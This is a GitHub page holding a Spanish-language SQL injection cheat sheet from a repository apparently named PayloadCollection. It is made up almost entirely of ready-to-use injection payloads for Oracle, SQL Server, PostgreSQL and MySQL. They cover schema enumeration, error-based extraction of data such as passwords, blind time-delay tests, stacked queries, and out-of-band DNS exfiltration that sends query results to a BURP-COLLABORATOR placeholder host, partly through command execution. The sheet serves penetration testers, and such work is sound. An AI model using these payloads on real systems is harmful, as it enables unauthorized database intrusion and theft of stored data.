PayloadCollection/SQLi injection cheat sheet at main · moften/PayloadCollection · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# 🧨 SQL Injection Cheat Sheet

Este cheat sheet contiene ejemplos de sintaxis útil que puedes emplear al realizar ataques de **inyección SQL** para una variedad de tareas comunes durante pruebas de seguridad.

---

## 🔗 String Concatenation

| SGBD         | Sintaxis                                   |
|--------------|--------------------------------------------|
| Oracle       | `'foo'||'bar'`                             |
| Microsoft    | `'foo'+'bar'`                              |
| PostgreSQL   | `'foo'||'bar'`                             |
| MySQL        | `'foo' 'bar'` *(nota: espacio entre comillas)*<br>`CONCAT('foo','bar')` |

---

## 🔎 Substring (extraer partes de cadenas)

Extrae parte de una cadena desde un desplazamiento específico:

| SGBD         | Sintaxis                           | Resultado (`ba`) |
|--------------|------------------------------------|------------------|
| Oracle       | `SUBSTR('foobar', 4, 2)`           | `ba`             |
| Microsoft    | `SUBSTRING('foobar', 4, 2)`        | `ba`             |
| PostgreSQL   | `SUBSTRING('foobar', 4, 2)`        | `ba`             |
| MySQL        | `SUBSTRING('foobar', 4, 2)`        | `ba`             |

---

## 💬 SQL Comments

| SGBD         | Sintaxis de comentario                       |
|--------------|----------------------------------------------|
| Oracle       | `--comment`                                  |
| Microsoft    | `--comment`, `/*comment*/`                   |
| PostgreSQL   | `--comment`, `/*comment*/`                   |
| MySQL        | `#comment`, `-- comment`, `/*comment*/`      |

---

## 🛠️ Obtener Versión de Base de Datos

| SGBD         | Consulta SQL                                   |
|--------------|------------------------------------------------|
| Oracle       | `SELECT banner FROM v$version`<br>`SELECT version FROM v$instance` |
| Microsoft    | `SELECT @@version`                             |
| PostgreSQL   | `SELECT version()`                             |
| MySQL        | `SELECT @@version`                             |

---

## 📦 Contenido de la Base de Datos

| SGBD         | Listar tablas y columnas                                      |
|--------------|---------------------------------------------------------------|
| Oracle       | `SELECT * FROM all_tables`<br>`SELECT * FROM all_tab_columns WHERE table_name = 'TABLE'` |
| Microsoft    | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |
| PostgreSQL   | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |
| MySQL        | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |

---

## ❗ Errores Condicionales

| SGBD         | Sintaxis condicional que genera error                          |
|--------------|---------------------------------------------------------------|
| Oracle       | `SELECT CASE WHEN (CONDICIÓN) THEN TO_CHAR(1/0) ELSE NULL END FROM dual` |
| Microsoft    | `SELECT CASE WHEN (CONDICIÓN) THEN 1/0 ELSE NULL END`         |
| PostgreSQL   | `1 = (SELECT CASE WHEN (CONDICIÓN) THEN 1/(SELECT 0) ELSE NULL END)` |
| MySQL        | `SELECT IF(CONDICIÓN,(SELECT table_name FROM information_schema.tables),'a')` |

---

## 🧪 Exfiltración de Datos vía Errores

| SGBD         | Consulta que filtra datos por mensaje de error                 |
|--------------|----------------------------------------------------------------|
| Microsoft    | `SELECT 'foo' WHERE 1 = (SELECT 'secret')`<br>➤ *Conversion failed...* |
| PostgreSQL   | `SELECT CAST((SELECT password FROM users LIMIT 1) AS int)`<br>➤ *invalid input syntax...* |
| MySQL        | `SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))`<br>➤ *XPATH syntax error...* |

---

## 🧱 Batched (Stacked) Queries

| SGBD         | Soporte de consultas múltiples                                 |
|--------------|----------------------------------------------------------------|
| Oracle       | ❌ No soportado                                                 |
| Microsoft    | `QUERY1; QUERY2`                                               |
| PostgreSQL   | `QUERY1; QUERY2`                                               |
| MySQL        | `QUERY1; QUERY2` *(puede requerir ciertas APIs en PHP/Python)* |

---

## ⏱️ Retrasos de Tiempo (Time Delays)

| SGBD         | Sintaxis de retraso incondicional (10s)                         |
|--------------|-----------------------------------------------------------------|
| Oracle       | `dbms_pipe.receive_message(('a'),10)`                           |
| Microsoft    | `WAITFOR DELAY '0:0:10'`                                        |
| PostgreSQL   | `SELECT pg_sleep(10)`                                          |
| MySQL        | `SELECT SLEEP(10)`                                             |

---

## ⏳ Retrasos Condicionales

| SGBD         | Retraso sólo si se cumple una condición                        |
|--------------|-----------------------------------------------------------------|
| Oracle       | `SELECT CASE WHEN (COND) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual` |
| Microsoft    | `IF (COND) WAITFOR DELAY '0:0:10'`                              |
| PostgreSQL   | `SELECT CASE WHEN (COND) THEN pg_sleep(10) ELSE pg_sleep(0) END` |
| MySQL        | `SELECT IF(COND,SLEEP(10),'a')`                                |

---

## 🌍 DNS Lookup (con Burp Collaborator)

| SGBD         | DNS lookup para detección remota                               |
|--------------|-----------------------------------------------------------------|
| Oracle       |
```sql
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR/"> %remote;]>'),'/l') FROM dual
```
-- o
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR')
| Microsoft    | exec master..xp_dirtree '//BURP-COLLABORATOR/a'              |
| PostgreSQL   | copy (SELECT '') to program 'nslookup BURP-COLLABORATOR'     |
| MySQL        | LOAD_FILE('\\\\BURP-COLLABORATOR\\a')SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR\\a' (solo en Windows) |
---

## Exfiltración DNS con Datos
| SGBD         | DNS con resultados incluidos en la consulta                     |
|--------------|-----------------------------------------------------------------|
| Oracle       | `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR_QUERY)||'.BURP-COLLABORATOR/"> %remote;]>'),'/l') FROM dual`
| Microsoft    | `DECLARE @p VARCHAR(1024); SET @p=(SELECT YOUR_QUERY); EXEC('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR/a"')`                              |
| PostgreSQL   | `CREATE OR REPLACE FUNCTION f() RETURNS void AS $$
DECLARE c TEXT; p TEXT;
BEGIN
  SELECT INTO p (SELECT YOUR_QUERY);
  c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR''';
  EXECUTE c;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT f();` |
| MySQL        | `SELECT YOUR_QUERY INTO OUTFILE '\\\\BURP-COLLABORATOR\\a' (Windows only)`                                |